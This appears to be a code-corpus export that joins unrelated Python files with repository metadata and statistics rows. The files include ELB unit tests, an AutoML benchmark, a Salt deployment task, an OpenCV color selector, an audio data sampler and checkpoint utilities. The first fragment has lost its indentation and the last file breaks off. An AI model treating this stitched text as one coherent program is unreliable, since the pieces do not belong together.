def test_adiciona_curso_no_catalogo(self):
curso_1 = self._cria_curso()
expected = [curso_1]
actual = self.catalogo.pega_cursos()
assert actual == expected
def _cria_curso(self, curso=curso,
materia_1=materia_1,
materia_2=materia_2,
materia_3=materia_3):
curso_1 = Curso(curso)
curso_1.atualiza_materias(Materia(materia_1))
curso_1.atualiza_materias(Materia(materia_2))
curso_1.atualiza_materias(Materia(materia_3))
return curso_1 | 31.925373 | 54 | 0.649836 | 251 | 2,139 | 5.203187 | 0.183267 | 0.101072 | 0.069678 | 0.084227 | 0.55513 | 0.457121 | 0.332312 | 0.332312 | 0.305513 | 0.266462 | 0 | 0.019658 | 0.26274 | 2,139 | 67 | 55 | 31.925373 | 0.808497 | 0 | 0 | 0.363636 | 0 | 0 | 0.025234 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 1 | 0.163636 | false | 0 | 0.054545 | 0 | 0.327273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce35431b33811cb36dbd79aae7d5f814ea244b0 | 2,149 | py | Python | compare_Tensorflow_Sckit_Learn/benchmark_classification.py | sinkingtitanic/mljar-examples | 1ea4e99f4751f20b90e22cb75e6a7424005722e5 | [
"Apache-2.0"
] | 43 | 2017-02-01T21:44:39.000Z | 2022-03-29T13:59:48.000Z | compare_Tensorflow_Sckit_Learn/benchmark_classification.py | sinkingtitanic/mljar-examples | 1ea4e99f4751f20b90e22cb75e6a7424005722e5 | [
"Apache-2.0"
] | 7 | 2017-02-22T09:11:05.000Z | 2021-09-02T09:10:48.000Z | compare_Tensorflow_Sckit_Learn/benchmark_classification.py | sinkingtitanic/mljar-examples | 1ea4e99f4751f20b90e22cb75e6a7424005722e5 | [
"Apache-2.0"
] | 23 | 2017-02-22T09:08:45.000Z | 2022-02-11T01:01:38.000Z | import os
import time
import json
import numpy as np
import pandas as pd
from supervised.automl import AutoML
from sklearn.model_selection import train_test_split
from sklearn.metrics import log_loss
from sklearn.model_selection import train_test_split
from pmlb import fetch_data, classification_dataset_names
results = json.load(open("results.json"))
for classification_dataset in classification_dataset_names:
X, y = fetch_data(classification_dataset, return_X_y=True)
if X.shape[0] < 1000:
continue
if classification_dataset in [r["dataset"] for r in results]:
continue
print(classification_dataset, X.shape, y[:5], np.unique(y))
train_X, test_X, train_y, test_y = train_test_split(
X, y, test_size=0.25, stratify=y, random_state=12
)
ml_task = "binary_classification"
if len(np.unique(y)) > 2:
ml_task = "multiclass_classification"
mlp = AutoML(
algorithms=["MLP"],
mode="Perform",
explain_level=0,
train_ensemble=False,
golden_features=False,
features_selection=False,
ml_task=ml_task,
)
nn = AutoML(
algorithms=["Neural Network"],
mode="Perform",
explain_level=0,
train_ensemble=False,
golden_features=False,
features_selection=False,
ml_task=ml_task,
)
mlp.fit(train_X, train_y)
mlp_time = np.round(time.time() - mlp._start_time, 2)
nn.fit(train_X, train_y)
nn_time = np.round(time.time() - nn._start_time, 2)
mlp_ll = log_loss(test_y, mlp.predict_proba(test_X))
nn_ll = log_loss(test_y, nn.predict_proba(test_X))
print(classification_dataset, X.shape, np.unique(y), mlp_ll, nn_ll)
results += [
{
"dataset": classification_dataset,
"nrows": X.shape[0],
"ncols": X.shape[1],
"n_classes": len(np.unique(y)),
"mlp_logloss": mlp_ll,
"nn_logloss": nn_ll,
"mlp_time": mlp_time,
"nn_time": nn_time,
}
]
with open("results.json", "w") as fout:
fout.write(json.dumps(results, indent=4))
| 28.653333 | 71 | 0.64309 | 294 | 2,149 | 4.442177 | 0.302721 | 0.128637 | 0.027565 | 0.038285 | 0.343032 | 0.220521 | 0.220521 | 0.220521 | 0.220521 | 0.145482 | 0 | 0.011743 | 0.247092 | 2,149 | 74 | 72 | 29.040541 | 0.795426 | 0 | 0 | 0.253968 | 0 | 0 | 0.079572 | 0.021405 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.15873 | 0 | 0.15873 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce9127e33056554245ec6ea9cf2a6b7954bef54 | 8,576 | py | Python | test/unit/test_disco_elb.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | null | null | null | test/unit/test_disco_elb.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | 4 | 2016-03-22T17:04:04.000Z | 2016-03-23T18:03:45.000Z | test/unit/test_disco_elb.py | Angakkuit/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
] | null | null | null | """Tests of disco_elb"""
from unittest import TestCase
from mock import MagicMock
from moto import mock_elb
from disco_aws_automation import DiscoELB
TEST_ENV_NAME = 'unittestenv'
TEST_HOSTCLASS = 'mhcunit'
TEST_VPC_ID = 'vpc-56e10e3d' # the hard coded VPC Id that moto will always return
TEST_DOMAIN_NAME = 'test.example.com'
def _get_vpc_mock():
vpc_mock = MagicMock()
vpc_mock.environment_name = TEST_ENV_NAME
vpc_mock.vpc = MagicMock()
vpc_mock.vpc.id = TEST_VPC_ID
return vpc_mock
class DiscoELBTests(TestCase):
"""Test DiscoELB"""
def setUp(self):
self.disco_elb = DiscoELB(_get_vpc_mock(), route53=MagicMock(), acm=MagicMock(), iam=MagicMock())
self.disco_elb.acm.get_certificate_arn = MagicMock(return_value="arn:aws:acm::123:blah")
self.disco_elb.iam.get_certificate_arn = MagicMock(return_value="arn:aws:iam::123:blah")
def _create_elb(self, hostclass=None, public=False, tls=False,
idle_timeout=None, connection_draining_timeout=None,
sticky_app_cookie=None):
return self.disco_elb.get_or_create_elb(
hostclass=hostclass or TEST_HOSTCLASS,
security_groups=['sec-1'],
subnets=['sub-1'],
hosted_zone_name=TEST_DOMAIN_NAME,
health_check_url="/",
instance_protocol="HTTP",
instance_port=80,
elb_protocol="HTTPS" if tls else "HTTP",
elb_port=443 if tls else 80,
elb_public=public,
sticky_app_cookie=sticky_app_cookie,
idle_timeout=idle_timeout,
connection_draining_timeout=connection_draining_timeout)
@mock_elb
def test_get_certificate_arn_prefers_acm(self):
'''get_certificate_arn() prefers an ACM provided certificate'''
self.assertEqual(self.disco_elb.get_certificate_arn("dummy"), "arn:aws:acm::123:blah")
@mock_elb
def test_get_certificate_arn_fallback_to_iam(self):
'''get_certificate_arn() uses an IAM certificate if no ACM cert available'''
self.disco_elb.acm.get_certificate_arn = MagicMock(return_value=None)
self.assertEqual(self.disco_elb.get_certificate_arn("dummy"), "arn:aws:iam::123:blah")
@mock_elb
def test_get_cname(self):
'''Make sure get_cname returns what we expect'''
self.assertEqual(self.disco_elb.get_cname(TEST_HOSTCLASS, TEST_DOMAIN_NAME),
"mhcunit-unittestenv.test.example.com")
@mock_elb
def test_get_elb_with_create(self):
"""Test creating a ELB"""
self._create_elb()
self.assertEquals(
len(self.disco_elb.elb_client.describe_load_balancers()['LoadBalancerDescriptions']), 1)
@mock_elb
def test_get_elb_with_update(self):
"""Updating an ELB doesn't add create a new ELB"""
self._create_elb()
self._create_elb()
self.assertEquals(
len(self.disco_elb.elb_client.describe_load_balancers()['LoadBalancerDescriptions']), 1)
@mock_elb
def test_get_elb_internal(self):
"""Test creation an internal private ELB"""
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb()
self.disco_elb.elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTP',
'LoadBalancerPort': 80,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': 'arn:aws:acm::123:blah'
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'],
Scheme='internal')
@mock_elb
def test_get_elb_internal_no_tls(self):
"""Test creation an internal private ELB"""
self.disco_elb.acm.get_certificate_arn = MagicMock(return_value=None)
self.disco_elb.iam.get_certificate_arn = MagicMock(return_value=None)
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb()
elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTP',
'LoadBalancerPort': 80,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': ''
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'],
Scheme='internal')
@mock_elb
def test_get_elb_external(self):
"""Test creation a publically accessible ELB"""
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb(public=True)
elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTP',
'LoadBalancerPort': 80,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': 'arn:aws:acm::123:blah'
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'])
@mock_elb
def test_get_elb_with_tls(self):
"""Test creation an ELB with TLS"""
elb_client = self.disco_elb.elb_client
elb_client.create_load_balancer = MagicMock(wraps=elb_client.create_load_balancer)
self._create_elb(tls=True)
elb_client.create_load_balancer.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
Listeners=[{
'Protocol': 'HTTPS',
'LoadBalancerPort': 443,
'InstanceProtocol': 'HTTP',
'InstancePort': 80,
'SSLCertificateId': 'arn:aws:acm::123:blah'
}],
Subnets=['sub-1'],
SecurityGroups=['sec-1'],
Scheme='internal')
@mock_elb
def test_get_elb_with_idle_timeout(self):
"""Test creating an ELB with an idle timeout"""
client = self.disco_elb.elb_client
client.modify_load_balancer_attributes = MagicMock(wraps=client.modify_load_balancer_attributes)
self._create_elb(idle_timeout=100)
client.modify_load_balancer_attributes.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
LoadBalancerAttributes={'ConnectionDraining': {'Enabled': False, 'Timeout': 0},
'ConnectionSettings': {'IdleTimeout': 100}}
)
@mock_elb
def test_get_elb_with_connection_draining(self):
"""Test creating ELB with connection draining"""
client = self.disco_elb.elb_client
client.modify_load_balancer_attributes = MagicMock(wraps=client.modify_load_balancer_attributes)
self._create_elb(connection_draining_timeout=100)
client.modify_load_balancer_attributes.assert_called_once_with(
LoadBalancerName='unittestenv-mhcunit',
LoadBalancerAttributes={'ConnectionDraining': {'Enabled': True, 'Timeout': 100}}
)
@mock_elb
def test_delete_elb(self):
"""Test deleting an ELB"""
self._create_elb()
self.disco_elb.delete_elb(TEST_HOSTCLASS)
load_balancers = self.disco_elb.elb_client.describe_load_balancers()['LoadBalancerDescriptions']
self.assertEquals(len(load_balancers), 0)
@mock_elb
def test_get_existing_elb(self):
"""Test get_elb for a hostclass"""
self._create_elb()
self.assertIsNotNone(self.disco_elb.get_elb(TEST_HOSTCLASS))
@mock_elb
def test_list(self):
"""Test getting the list of ELBs"""
self._create_elb(hostclass='mhcbar')
self._create_elb(hostclass='mhcfoo')
self.assertEquals(len(self.disco_elb.list()), 2)
@mock_elb
def test_elb_delete(self):
"""Test deletion of ELBs"""
self._create_elb(hostclass='mhcbar')
self.disco_elb.delete_elb(hostclass='mhcbar')
self.assertEquals(len(self.disco_elb.list()), 0)
@mock_elb
def test_destroy_all_elbs(self):
"""Test deletion of all ELBs"""
self._create_elb(hostclass='mhcbar')
self._create_elb(hostclass='mhcfoo')
self.disco_elb.destroy_all_elbs()
self.assertEquals(len(self.disco_elb.list()), 0)
| 39.33945 | 105 | 0.645872 | 991 | 8,576 | 5.262361 | 0.159435 | 0.042953 | 0.062128 | 0.042953 | 0.644295 | 0.616683 | 0.60441 | 0.553595 | 0.524449 | 0.511793 | 0 | 0.01256 | 0.248018 | 8,576 | 217 | 106 | 39.520737 | 0.796092 | 0.079524 | 0 | 0.546512 | 0 | 0 | 0.121364 | 0.03268 | 0 | 0 | 0 | 0 | 0.093023 | 1 | 0.110465 | false | 0 | 0.023256 | 0.005814 | 0.151163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce9bb2a8ae8eb5792bff17cb6dc037088a6cdd3 | 2,765 | py | Python | colorselect.py | aimuch/CarND-Advanced-Lane-Lines | d955d31e4f8d72b2651dd9ce1e58d5be64e9004f | [
"MIT"
] | 1 | 2020-12-17T11:09:19.000Z | 2020-12-17T11:09:19.000Z | colorselect.py | aimuch/CarND-Advanced-Lane-Lines | d955d31e4f8d72b2651dd9ce1e58d5be64e9004f | [
"MIT"
] | null | null | null | colorselect.py | aimuch/CarND-Advanced-Lane-Lines | d955d31e4f8d72b2651dd9ce1e58d5be64e9004f | [
"MIT"
] | 1 | 2020-12-17T11:09:20.000Z | 2020-12-17T11:09:20.000Z |
# coding: utf-8
# In[2]:
import cv2
import numpy as np
import sys
# callback function
def nothing(x):
pass
# import image
inputImageName = 'test_images/test1.jpg'
try:
img = cv2.imread(inputImageName) # BRG
WindowName = 'Color Select V1.0'
cv2.namedWindow(WindowName)
cv2.imshow(WindowName,img)
except Exception as err:
print ('Exception: ', err)
print("Open file %s failed!"%(inputImageName))
sys.exit(-1)
# create trackbars for color change
WindowName_1_L = 'CH 1 Down'
WindowName_1_R = 'CH 1 UP'
WindowName_2_L = 'CH 2 Down'
WindowName_2_R = 'CH 2 UP'
WindowName_3_L = 'CH 3 Down'
WindowName_3_R = 'CH 3 UP'
cv2.createTrackbar(WindowName_1_L,WindowName,0,255,nothing)
cv2.createTrackbar(WindowName_1_R,WindowName,0,255,nothing)
cv2.setTrackbarPos(WindowName_1_L,WindowName,0)
cv2.setTrackbarPos(WindowName_1_R,WindowName,255)
cv2.createTrackbar(WindowName_2_L,WindowName,0,255,nothing)
cv2.createTrackbar(WindowName_2_R,WindowName,0,255,nothing)
cv2.setTrackbarPos(WindowName_2_L,WindowName,0)
cv2.setTrackbarPos(WindowName_2_R,WindowName,255)
cv2.createTrackbar(WindowName_3_L,WindowName,0,255,nothing)
cv2.createTrackbar(WindowName_3_R,WindowName,0,255,nothing)
cv2.setTrackbarPos(WindowName_3_L,WindowName,0)
cv2.setTrackbarPos(WindowName_3_R,WindowName,255)
switch = '0 : RGB \n1 : HSV \n2 : HSL'
cv2.createTrackbar(switch,WindowName,0,2,nothing)
def colorselect(image,ch1,ch1up,ch2,ch2up,ch3,ch3up):
if ch1<ch1up and ch2<ch2up and ch3<ch3up:
mode = cv2.getTrackbarPos(switch,WindowName)
modeDict = {0:cv2.COLOR_BGR2RGB, 1:cv2.COLOR_BGR2HSV, 2:cv2.COLOR_BGR2HLS}
colormode = modeDict[mode]
convertedImage = cv2.cvtColor(image, colormode)
lower_color = np.array([ch1, ch2, ch3])
upper_color = np.array([ch1up, ch2up, ch3up])
color_mask = cv2.inRange(convertedImage, lower_color, upper_color)
dst = cv2.bitwise_and(image, image, mask = color_mask)
return dst
else:
return image
if __name__ == '__main__':
while(True):
# Push ESC exit
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
# get current positions of four trackbars
ch1 = cv2.getTrackbarPos(WindowName_1_L,WindowName)
ch1up= cv2.getTrackbarPos(WindowName_1_R,WindowName)
ch2 = cv2.getTrackbarPos(WindowName_2_L,WindowName)
ch2up= cv2.getTrackbarPos(WindowName_2_R,WindowName)
ch3 = cv2.getTrackbarPos(WindowName_3_L,WindowName)
ch3up= cv2.getTrackbarPos(WindowName_3_R,WindowName)
filtedimg = colorselect(img,ch1,ch1up,ch2,ch2up,ch3,ch3up)
# Display the image
cv2.imshow(WindowName,filtedimg)
cv2.destroyAllWindows()
| 30.054348 | 82 | 0.713562 | 375 | 2,765 | 5.082667 | 0.293333 | 0.057712 | 0.084995 | 0.066107 | 0.292235 | 0.283841 | 0.15425 | 0.15425 | 0 | 0 | 0 | 0.066225 | 0.180832 | 2,765 | 91 | 83 | 30.384615 | 0.775276 | 0.05859 | 0 | 0 | 0 | 0 | 0.058687 | 0.008108 | 0 | 0 | 0.001544 | 0 | 0 | 1 | 0.032258 | false | 0.016129 | 0.048387 | 0 | 0.112903 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ceab29943b8310e28f9a2de61cf44e20bdc7625 | 1,918 | py | Python | src/deploy/tasks.py | bluesnailstw/flamingos | e13bf4ac4caa5fa50e45d7285877c64218c49723 | [
"Apache-2.0"
] | null | null | null | src/deploy/tasks.py | bluesnailstw/flamingos | e13bf4ac4caa5fa50e45d7285877c64218c49723 | [
"Apache-2.0"
] | null | null | null | src/deploy/tasks.py | bluesnailstw/flamingos | e13bf4ac4caa5fa50e45d7285877c64218c49723 | [
"Apache-2.0"
] | null | null | null | from salt.salt_api import Pepper
from asset.models import Host, HostGroup
from deploy.models import Task, TASK_STATUS, History
from django.conf import settings
from users.models import User
from pillars.models import Vars, Configuration
from redis import StrictRedis
def get_all_hosts(task: Task):
hosts = set()
def travel(node: HostGroup):
if node is None:
return
for host in node.hosts.filter(inventory=task.inventory):
hosts.add(host.host_name)
for child in node.children.all():
travel(child)
if task.target:
travel(task.target)
else:
travel(task.project.host_group)
return list(hosts)
def deploy_async(t_id: int, user: User, self_vars: dict):
task = Task.objects.get(id=t_id)
sls = task.project.sls.replace(settings.SALT_STATE_DIRECTORY, '')
hosts = get_all_hosts(task)
values = {**{value.configure.name: value.value
for value in Vars.objects.filter(inventory=task.inventory)}, **self_vars}
pipe = StrictRedis(host=settings.REDIS_HOST_SERVER,
port=settings.REDIS_HOST_PORT,
db=settings.REDIS_DB).pipeline()
for hostname in hosts:
pipe.delete(hostname)
pipe.hmset(hostname, values)
responses = pipe.execute()
print("sync values to redis for hostname[%s], result: %s" % (hostname, str(responses)))
print("project %s deployed on hosts; %s" % (task.project.name, hosts))
p = Pepper().login()
result = p.local_async(tgt=hosts, fun='state.sls',
arg=[sls], tgt_type='list')
# {'return': [{'jid': '20190301083447106122', 'minions': ['074cda43674f']}]}
task.status = TASK_STATUS[1][0]
job_id = result['return'][0]['jid']
task.barn = result['return'][0]['minions']
task.occupy = job_id
task.operator = user
task.save()
return job_id
| 36.188679 | 95 | 0.642857 | 250 | 1,918 | 4.828 | 0.388 | 0.039768 | 0.018227 | 0.024855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021769 | 0.233577 | 1,918 | 52 | 96 | 36.884615 | 0.79932 | 0.038582 | 0 | 0 | 0 | 0 | 0.062975 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.152174 | 0 | 0.282609 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cecd887cd2d7bcda8c9d8ae4eceae2fd8fa82da | 547 | py | Python | PythonDAdata/3358OS_07_Code/code7/spectrum.py | shijiale0609/Python_Data_Analysis | c18b5ed006c171bbb6fcb6be5f51b2686edc8f7e | [
"MIT"
] | 1 | 2020-02-22T18:55:54.000Z | 2020-02-22T18:55:54.000Z | PythonDAdata/3358OS_07_Code/code7/spectrum.py | shijiale0609/Python_Data_Analysis | c18b5ed006c171bbb6fcb6be5f51b2686edc8f7e | [
"MIT"
] | null | null | null | PythonDAdata/3358OS_07_Code/code7/spectrum.py | shijiale0609/Python_Data_Analysis | c18b5ed006c171bbb6fcb6be5f51b2686edc8f7e | [
"MIT"
] | 1 | 2020-02-22T18:55:57.000Z | 2020-02-22T18:55:57.000Z | import numpy as np
import statsmodels.api as sm
import matplotlib.pyplot as plt
from scipy.fftpack import rfft
from scipy.fftpack import fftshift
data_loader = sm.datasets.sunspots.load_pandas()
sunspots = data_loader.data["SUNACTIVITY"].values
transformed = fftshift(rfft(sunspots))
plt.subplot(311)
plt.plot(sunspots, label="Sunspots")
plt.legend()
plt.subplot(312)
plt.plot(transformed ** 2, label="Power Spectrum")
plt.legend()
plt.subplot(313)
plt.plot(np.angle(transformed), label="Phase Spectrum")
plt.grid(True)
plt.legend()
plt.show()
| 23.782609 | 55 | 0.776965 | 81 | 547 | 5.209877 | 0.481481 | 0.07109 | 0.085308 | 0.104265 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020121 | 0.091408 | 547 | 22 | 56 | 24.863636 | 0.828974 | 0 | 0 | 0.157895 | 0 | 0 | 0.085923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.263158 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ceebb2258c9e0ad6b3d981ef9099fdb41bb09c6 | 4,170 | py | Python | task02/laughter_classification/sspnet_data_sampler.py | rebryk/SPbAU-Speech-Recognition | 8b1993d17d223f507f4e80154823a075e713ee52 | [
"MIT"
] | 1 | 2019-04-22T14:10:46.000Z | 2019-04-22T14:10:46.000Z | task02/laughter_classification/sspnet_data_sampler.py | rebryk/SPbAU-Speech-Recognition | 8b1993d17d223f507f4e80154823a075e713ee52 | [
"MIT"
] | 15 | 2020-01-28T22:25:14.000Z | 2022-03-11T23:24:04.000Z | task02/laughter_classification/sspnet_data_sampler.py | rebryk/SPbAU-Speech-Recognition | 8b1993d17d223f507f4e80154823a075e713ee52 | [
"MIT"
] | 1 | 2019-04-22T14:01:21.000Z | 2019-04-22T14:01:21.000Z | import os
from os.path import join
import numpy as np
import pandas as pd
import scipy.io.wavfile as wav
from laughter_classification.utils import chunks, in_any, interv_to_range, get_sname
from laughter_prediction.sample_audio import sample_wav_by_time, sample_by_frames
class SSPNetDataSampler:
"""
Class for loading and sampling audio data by frames for SSPNet Vocalization Corpus
"""
def __init__(self, corpus_root):
self.sample_rate = 16000
self.duration = 11
self.default_len = self.sample_rate * self.duration
self.data_dir = join(corpus_root, 'data')
labels_path = join(corpus_root, 'labels.txt')
self.labels = self.read_labels(labels_path)
@staticmethod
def read_labels(labels_path):
def_cols = ['Sample', 'original_spk', 'gender', 'original_time']
label_cols = ['{}_{}'.format(name, ind) for ind in range(6) for name in ('type_voc', 'start_voc', 'end_voc')]
def_cols.extend(label_cols)
labels = pd.read_csv(labels_path, names=def_cols, engine='python', skiprows=1)
return labels
@staticmethod
def most(l):
return int(sum(l) > len(l) / 2)
@staticmethod
def _interval_generator(incidents):
for itype, start, end in chunks(incidents, 3):
if itype == 'laughter':
yield start, end
def get_labels_for_file(self, wav_path, frame_sec):
sname = get_sname(wav_path)
sample = self.labels[self.labels.Sample == sname]
incidents = sample.loc[:, 'type_voc_0': 'end_voc_5']
incidents = incidents.dropna(axis=1, how='all')
incidents = incidents.values[0]
rate, audio = wav.read(wav_path)
laughts = self._interval_generator(incidents)
laughts = [interv_to_range(x, len(audio), self.duration) for x in laughts]
laught_along = [1 if in_any(t, laughts) else 0 for t, _ in enumerate(audio)]
frame_size = int(self.sample_rate * frame_sec)
shift = 3 * frame_size // 4
is_laughter = np.array([self.most(la) for la in sample_by_frames(laught_along, frame_size, shift)])
df = pd.DataFrame({'IS_LAUGHTER': is_laughter, 'SNAME': sname})
return df
def df_from_file(self, wav_path, frame_sec):
"""
Returns sampled data by path to audio file
:param wav_path: string, .wav file path
:param frame_sec: int, length of each frame in sec
:return: pandas.DataFrame with sampled audio
"""
data = sample_wav_by_time(wav_path, frame_sec)
labels = self.get_labels_for_file(wav_path, frame_sec)
df = pd.concat([data, labels], axis=1)
return df
def get_valid_wav_paths(self):
for dirpath, dirnames, filenames in os.walk(self.data_dir):
fullpaths = [join(dirpath, fn) for fn in filenames]
return [path for path in fullpaths if len(wav.read(path)[1]) == self.default_len]
def create_sampled_df(self, frame_sec, naudio=None, save_path=None, force_save=False):
"""
Returns sampled data for whole corpus
:param frame_sec: int, length of each frame in sec
:param naudio: int, number of audios to parse, if not defined parses all
:param save_path: string, path to save parsed corpus
:param force_save: boolean, if you want to override file with same name
:return:
"""
fullpaths = self.get_valid_wav_paths()[:naudio]
dataframes = [self.df_from_file(wav_path, frame_sec) for wav_path in fullpaths]
df = pd.concat(dataframes)
colnames = [f'V{i}' for i in range(df.shape[1] - 2)]
colnames.append('IS_LAUGHTER')
colnames.append('SNAME')
df.columns = colnames
if save_path is not None:
if not os.path.isfile(save_path) or force_save:
print(f'Saving dataset to {save_path}')
df.to_csv(save_path, compression='gzip', index=False)
return df
if __name__ == '__main__':
sampler = SSPNetDataSampler('../vocalizationcorpus')
df = sampler.create_sampled_df(frame_sec=1, naudio=2, save_path='dataset')
| 37.567568 | 117 | 0.652518 | 583 | 4,170 | 4.445969 | 0.291595 | 0.030864 | 0.023148 | 0.028935 | 0.061728 | 0.047068 | 0.029321 | 0.029321 | 0.029321 | 0.029321 | 0 | 0.007952 | 0.246043 | 4,170 | 110 | 118 | 37.909091 | 0.816476 | 0.133573 | 0 | 0.085714 | 0 | 0 | 0.063378 | 0.006022 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.1 | 0.014286 | 0.314286 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf06799512c6201d366260a7eba4f0f1f5ed5fa | 3,292 | py | Python | cvpods/checkpoint/utils.py | tonysy/cvpods | e322d7842ca0e34b1ef6237ea6d350633efc793a | [
"Apache-2.0"
] | 758 | 2021-03-11T08:14:26.000Z | 2022-03-31T07:24:13.000Z | cvpods/checkpoint/utils.py | tonysy/cvpods | e322d7842ca0e34b1ef6237ea6d350633efc793a | [
"Apache-2.0"
] | 58 | 2020-12-04T19:47:10.000Z | 2022-03-30T06:52:13.000Z | cvpods/checkpoint/utils.py | tonysy/cvpods | e322d7842ca0e34b1ef6237ea6d350633efc793a | [
"Apache-2.0"
] | 110 | 2021-03-18T01:59:31.000Z | 2022-03-18T21:26:56.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import collections
from collections import defaultdict
from termcolor import colored
def get_missing_parameters_message(keys: list):
"""
Get a logging-friendly message to report parameter names (keys) that are in
the model but not found in a checkpoint.
Args:
keys (list[str]): List of keys that were not found in the checkpoint.
Returns:
str: message.
"""
groups = _group_checkpoint_keys(keys)
msg = "Some model parameters are not in the checkpoint:\n"
msg += "\n".join(
" " + colored(k + _group_to_str(v), "blue") for k, v in groups.items()
)
return msg
def get_unexpected_parameters_message(keys: list):
"""
Get a logging-friendly message to report parameter names (keys) that are in
the checkpoint but not found in the model.
Args:
keys (list[str]): List of keys that were not found in the model.
Returns:
str: message.
"""
groups = _group_checkpoint_keys(keys)
msg = "The checkpoint contains parameters not used by the model:\n"
msg += "\n".join(
" " + colored(k + _group_to_str(v), "magenta")
for k, v in groups.items()
)
return msg
def _strip_prefix_if_present(state_dict: collections.OrderedDict, prefix: str):
"""
Strip the prefix in metadata, if any.
Args:
state_dict (OrderedDict): a state-dict to be loaded to the model.
prefix (str): prefix.
"""
keys = sorted(state_dict.keys())
if not all(len(key) == 0 or key.startswith(prefix) for key in keys):
return
for key in keys:
newkey = key[len(prefix):]
state_dict[newkey] = state_dict.pop(key)
# also strip the prefix in metadata, if any..
try:
metadata = state_dict._metadata
except AttributeError:
pass
else:
for key in list(metadata.keys()):
# for the metadata dict, the key can be:
# '': for the DDP module, which we want to remove.
# 'module': for the actual model.
# 'module.xx.xx': for the rest.
if len(key) == 0:
continue
newkey = key[len(prefix):]
metadata[newkey] = metadata.pop(key)
def _group_checkpoint_keys(keys: list):
"""
Group keys based on common prefixes. A prefix is the string up to the final
"." in each key.
Args:
keys (list[str]): list of parameter names, i.e. keys in the model
checkpoint dict.
Returns:
dict[list]: keys with common prefixes are grouped into lists.
"""
groups = defaultdict(list)
for key in keys:
pos = key.rfind(".")
if pos >= 0:
head, tail = key[:pos], [key[pos + 1:]]
else:
head, tail = key, []
groups[head].extend(tail)
return groups
def _group_to_str(group: list):
"""
Format a group of parameter name suffixes into a loggable string.
Args:
group (list[str]): list of parameter name suffixes.
Returns:
str: formated string.
"""
if len(group) == 0:
return ""
if len(group) == 1:
return "." + group[0]
